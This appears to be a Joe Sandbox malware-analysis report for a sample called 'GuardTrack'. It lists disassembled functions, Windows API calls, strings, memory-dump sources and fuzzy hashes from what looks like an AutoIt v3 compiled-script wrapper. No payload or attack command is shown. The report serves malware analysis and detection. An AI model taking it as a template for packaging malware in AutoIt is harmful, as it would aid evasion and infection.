RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006001BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006001FB
RegCloseKey.ADVAPI32(?), ref: 00600239
_wcscat.LIBCMT ref: 00600292

Strings

Software\AutoIt v3\AutoIt, xrefs: 005C30D8
Include, xrefs: 006001B1, 006001F2
\, xrefs: 006002B5
\Include\, xrefs: 005C309F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: fece3bf502e44313e4d9f380e1d706063b04bd4f030048a0730bdf58080a680e
Instruction ID: 19ead606af3ad87191654ab4ecb63dee60598d743e5cb5e187e179b4c0b0ec8f
Opcode Fuzzy Hash: fece3bf502e44313e4d9f380e1d706063b04bd4f030048a0730bdf58080a680e
Instruction Fuzzy Hash: 4A71A0714447029ED318EF65D849AABBFEAFF95341F40152EF459832A2EF308A84CB95

Function 005C514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 005C5156
LoadCursorW.USER32(00000000,00007F00), ref: 005C5165
LoadIconW.USER32(00000063), ref: 005C517C
LoadIconW.USER32(000000A4), ref: 005C518E
LoadIconW.USER32(000000A2), ref: 005C51A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005C51C6
RegisterClassExW.USER32(?), ref: 005C521C

Part of subcall function 005B3411: GetSysColorBrush.USER32(0000000F), ref: 005B3444
Part of subcall function 005B3411: RegisterClassExW.USER32(00000030), ref: 005B346E
Part of subcall function 005B3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005B347F
Part of subcall function 005B3411: InitCommonControlsEx.COMCTL32(?), ref: 005B349C
Part of subcall function 005B3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005B34AC
Part of subcall function 005B3411: LoadIconW.USER32(000000A9), ref: 005B34C2
Part of subcall function 005B3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005B34D1

Strings

AutoIt v3, xrefs: 005C520B
0, xrefs: 005C51FA
#, xrefs: 005C5201

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: b4ddb98bd445c8a44bfbc0d59bbb517b514d1c8c97ef362719ecdd200d63fd08
Instruction ID: a531862dc3512cd43d2276962f0be55b0314f69a857c0c3c881bfeb98b20e39c
Opcode Fuzzy Hash: b4ddb98bd445c8a44bfbc0d59bbb517b514d1c8c97ef362719ecdd200d63fd08
Instruction Fuzzy Hash: 87215E74D44318AFEB14DFA4ED09B9D7FB6FB08311F001229F628A62A1D7B55690CF84

Function 005C4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 005C4E22
KillTimer.USER32(?,00000001), ref: 005C4E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005C4E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005C4E7A
CreatePopupMenu.USER32 ref: 005C4E8E
PostQuitMessage.USER32(00000000), ref: 005C4EAF

Strings

TaskbarCreated, xrefs: 005C4E75

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 666920220edc72d1c2cb84e3f6592b4f1bf6127cc758d93ddef47c355e76e0e0
Instruction ID: 72c97a1eaaac043f5045f74c35b5dbfabcf19a9d230c8193711b8f9f2b857c68
Opcode Fuzzy Hash: 666920220edc72d1c2cb84e3f6592b4f1bf6127cc758d93ddef47c355e76e0e0
Instruction Fuzzy Hash: 7641263124860AAFEB195FA4DC2DFBA3E5BF741300F01152DF91696292CA71AC909F63

Function 005BAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005BADE1
OleUninitialize.OLE32(?,00000000), ref: 005BAE80
UnregisterHotKey.USER32(?), ref: 005BAFD7
DestroyWindow.USER32(?), ref: 005F2F64
FreeLibrary.KERNEL32(?), ref: 005F2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 005F2FF6

Strings

close all, xrefs: 005BADDC

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 59d18761b5b3ddb7263965967935b028611166cc6302b72812adf7eb7dbb3484
Instruction ID: 858df7b14a909af65a9bca4d2b2fb95dc424dad8c056918ac5d9d55a3b96f72b
Opcode Fuzzy Hash: 59d18761b5b3ddb7263965967935b028611166cc6302b72812adf7eb7dbb3484
Instruction Fuzzy Hash: 3EA18C747012128FDB29EF54C499BB9FB65BF44700F1442AEE90AAB252DB31ED12CF91

Function 005C56F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00600C5B

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

_memset.LIBCMT ref: 005C5787
_wcscpy.LIBCMT ref: 005C57DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005C57EB
__swprintf.LIBCMT ref: 00600CD1

Strings

AutoIt - , xrefs: 005C5760
Line %d: , xrefs: 00600CCB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: e63bafe20ddbbba403d97346e62b2ee390af67de2c5def6cdd599009b67a3fc6
Instruction ID: 8329653f2bb445e335ff208e8b89bc9788076f040568b46a5e145178a21f6aad
Opcode Fuzzy Hash: e63bafe20ddbbba403d97346e62b2ee390af67de2c5def6cdd599009b67a3fc6
Instruction Fuzzy Hash: 0C41C671008701AED325EBA0DC49FDF7BEDBF85350F000A1EF195921A2EB70A689C796

Function 00617681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00617698

Part of subcall function 005D0FE6: std::exception::exception.LIBCMT ref: 005D101C
Part of subcall function 005D0FE6: __CxxThrowException@8.LIBCMT ref: 005D1031

ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006176CF
EnterCriticalSection.KERNEL32(?), ref: 006176EB
_memmove.LIBCMT ref: 00617739
_memmove.LIBCMT ref: 00617756
LeaveCriticalSection.KERNEL32(?), ref: 00617765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0061777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00617799

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 07a4b8925eab960a27d6b5820dabcbbc861dd27e04e823d9ff081ce949fa3352
Instruction ID: 584abfeda6012eb8f52ebafebada280d1d49637330c32083fb40b29888ed1764
Opcode Fuzzy Hash: 07a4b8925eab960a27d6b5820dabcbbc861dd27e04e823d9ff081ce949fa3352
Instruction Fuzzy Hash: E431A335904105EBDB10EF94DC89EAFBB79FF85300F2440A6F904AB286D7709E50DBA0

Function 005BAAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 005D07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 005D07EC
Part of subcall function 005D07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 005D07F4
Part of subcall function 005D07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005D07FF
Part of subcall function 005D07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005D080A
Part of subcall function 005D07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 005D0812
Part of subcall function 005D07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 005D081A

Part of subcall function 005CFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005BAC6B), ref: 005CFFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005BAD08
OleInitialize.OLE32(00000000), ref: 005BAD85
FindCloseChangeNotification.KERNELBASE(00000000), ref: 005F2F56

Strings

\tg, xrefs: 005BAB32
sg, xrefs: 005BAB26
<wg, xrefs: 005BAC6B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Virtual$ChangeCloseFindHandleInitializeMessageNotificationRegisterWindow
String ID: <wg$\tg$sg
API String ID: 2135498668-1723596592
Opcode ID: fba5fc441b1374150f814e77baab1eceaef56ef7271f778c28e000f4fbd3b4c1
Instruction ID: 684bacd6303cb70f50ddd513def7a1a601f88433727af959b622daa1ad56fe25
Opcode Fuzzy Hash: fba5fc441b1374150f814e77baab1eceaef56ef7271f778c28e000f4fbd3b4c1
Instruction Fuzzy Hash: BD81B7B09083418EC39CEF79AD88A197FEBFB99314710A56AE40DC727AEB704484CF54

Function 005C50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005C5109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005C512A
ShowWindow.USER32(00000000), ref: 005C513E
ShowWindow.USER32(00000000), ref: 005C5147

Strings

edit, xrefs: 005C5124
AutoIt v3, xrefs: 005C5101, 005C5106, 005C5107

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: aababff323aafc2aa4f7a6091b0fabcb87d29eef9f2091c612e5e61897800860
Instruction ID: 149d874afa5d1f37225312465a676c3cc03a51585c4986a8c173e57e118a273c
Opcode Fuzzy Hash: aababff323aafc2aa4f7a6091b0fabcb87d29eef9f2091c612e5e61897800860
Instruction Fuzzy Hash: C0F017705442A07AEB211B236C08E272E7FE7C6F10F01102ABA28A22B2C6711880CAB0

Function 00619B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 005C4A8C: _fseek.LIBCMT ref: 005C4AA4

Part of subcall function 00619CF1: _wcscmp.LIBCMT ref: 00619DE1
Part of subcall function 00619CF1: _wcscmp.LIBCMT ref: 00619DF4

_free.LIBCMT ref: 00619C5F
_free.LIBCMT ref: 00619C66
_free.LIBCMT ref: 00619CD1

Part of subcall function 005D2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,005D9C54,00000000,005D8D5D,005D59C3,?), ref: 005D2F99
Part of subcall function 005D2F85: GetLastError.KERNEL32(00000000,?,005D9C54,00000000,005D8D5D,005D59C3,?), ref: 005D2FAB

_free.LIBCMT ref: 00619CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00619B8F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: fd6364e00a82ab507e73b3f603ffd602d6ccecf4d53230871cc746d3bc53c91e
Instruction ID: d952f6f687192087d645a9d01c0f2eb82445c4fbd0d6d290b538f1a0507fc7e8
Opcode Fuzzy Hash: fd6364e00a82ab507e73b3f603ffd602d6ccecf4d53230871cc746d3bc53c91e
Instruction Fuzzy Hash: 9F512DB1904219AFDF249FA4DC55A9EBBBAFF88304F00049EB649A3341D7715A80CF59

Function 005D0FE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005D593C: __FF_MSGBANNER.LIBCMT ref: 005D5953
Part of subcall function 005D593C: __NMSG_WRITE.LIBCMT ref: 005D595A
Part of subcall function 005D593C: RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,?,?,?,?,005D1003,?,0000FFFF), ref: 005D597F

std::exception::exception.LIBCMT ref: 005D101C
__CxxThrowException@8.LIBCMT ref: 005D1031

Part of subcall function 005D87CB: RaiseException.KERNEL32(?,?,0000FFFF,0066CAF8,?,?,?,?,?,005D1036,0000FFFF,0066CAF8,?,00000001), ref: 005D8820

Strings

`=d, xrefs: 005D1026, 005D1019
`=d, xrefs: 005D1029
h=d, xrefs: 005D1011

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: `=d$`=d$h=d
API String ID: 3902256705-3433976909
Opcode ID: 36332fc13354444e05dc334de47c4de2ab20fb6ea8f894983ae4741d06540d1e
Instruction ID: c0a63d94a93eb13d8e6a88fd2b50304db668bd19ca87b88c9c7634e2fe0a10e9
Opcode Fuzzy Hash: 36332fc13354444e05dc334de47c4de2ab20fb6ea8f894983ae4741d06540d1e
Instruction Fuzzy Hash: 29F0813550461EB6DB30BB9CE819AAE7FACBF41710F200467F91492391EFB18A80C2A5

Function 005D563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 005D569B
_memcpy_s.LIBCMT ref: 005D570D
__read_nolock.LIBCMT ref: 005D576B
__filbuf.LIBCMT ref: 005D578E
_memset.LIBCMT ref: 005D57D2

Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 75a00a1994e13321613c38f10d2e36132c69db1d3c26f954fd34f2c44e2cc4f2
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: C4518F30A00B06DBDB389E6D888466E7FA5FB403A0F748B6BF825963D0E7709D51DB40

Function 005B1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005B1275,SwapMouseButtons,00000004,?), ref: 005B12A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005B1275,SwapMouseButtons,00000004,?), ref: 005B12C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005B1275,SwapMouseButtons,00000004,?), ref: 005B12EB

Strings

Control Panel\Mouse, xrefs: 005B12A6

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 5e0819e10308304804fde9e26990d0d4190ce4af9744be66e3f723083f5be9b1
Instruction ID: cd823c177ecd1ce6d7a8c673a9dc63dfce4f27f1aafc6342b084de4c3aeace5e
Opcode Fuzzy Hash: 5e0819e10308304804fde9e26990d0d4190ce4af9744be66e3f723083f5be9b1
Instruction Fuzzy Hash: 83115A79510618BFEF608FA5DC84EEEBBB8FF05740F504959F905D7110E231AE4097A8

Function 005C278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 005C49C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,005C27AF,?,00000001), ref: 005C49F4

_free.LIBCMT ref: 005FFB04
_free.LIBCMT ref: 005FFB4B

Part of subcall function 005C29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005C2ADF

Strings

Bad directive syntax error, xrefs: 005FFB33

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 5b9a026d4bd519e589f76fb17fe15a10b2037ee7ce23bba911b0008f42ac89ee
Instruction ID: 86927b687a3761174b9a4394037530c47b8be947dfe4bcca9bc63eac3fb27872
Opcode Fuzzy Hash: 5b9a026d4bd519e589f76fb17fe15a10b2037ee7ce23bba911b0008f42ac89ee
Instruction Fuzzy Hash: BB91AC7190021EAFCF14EFA4CC95AEEBBB5BF48300F14442EF915AB2A1DB349945CB54

Function 005C48B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005C48FA

Strings

EA06, xrefs: 006008A1
AU3! ?d, xrefs: 005C48F4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memmove
String ID: AU3! ?d$EA06
API String ID: 4104443479-44268730
Opcode ID: f2f6104b4e62ef142544be0e0d7fc8d5d7e2fe73da08a422cb73aa04316c213e
Instruction ID: a60fdc8deacf42172062e660ebc0e8b52d9c1e317919d9676253940c3ef99d2d
Opcode Fuzzy Hash: f2f6104b4e62ef142544be0e0d7fc8d5d7e2fe73da08a422cb73aa04316c213e
Instruction Fuzzy Hash: A4414B21A041685FDF259BD48C65FFF7FA6BB85310F58846DE882A7386D6308D848BA1

Function 00619CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 005C4AB2: __fread_nolock.LIBCMT ref: 005C4AD0

_wcscmp.LIBCMT ref: 00619DE1
_wcscmp.LIBCMT ref: 00619DF4

Strings

FILE, xrefs: 00619D2D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 1de0a72684861f16c8fc82869bc71622108ee88cd34fec6c4b222475fd9d707d
Instruction ID: 6ab5386034d013b85d593267d91a1aecf24587532ca8f638f5dab6894e5d2a2a
Opcode Fuzzy Hash: 1de0a72684861f16c8fc82869bc71622108ee88cd34fec6c4b222475fd9d707d
Instruction Fuzzy Hash: 2041D971A4020ABADF21DAE4CC59FDF7BFEEF85710F04446AF900E7281D67199448BA5

Function 005C31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0060032B
GetOpenFileNameW.COMDLG32(?), ref: 00600375

Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4

Part of subcall function 005D09C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005D09E4

Strings

X, xrefs: 00600343

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

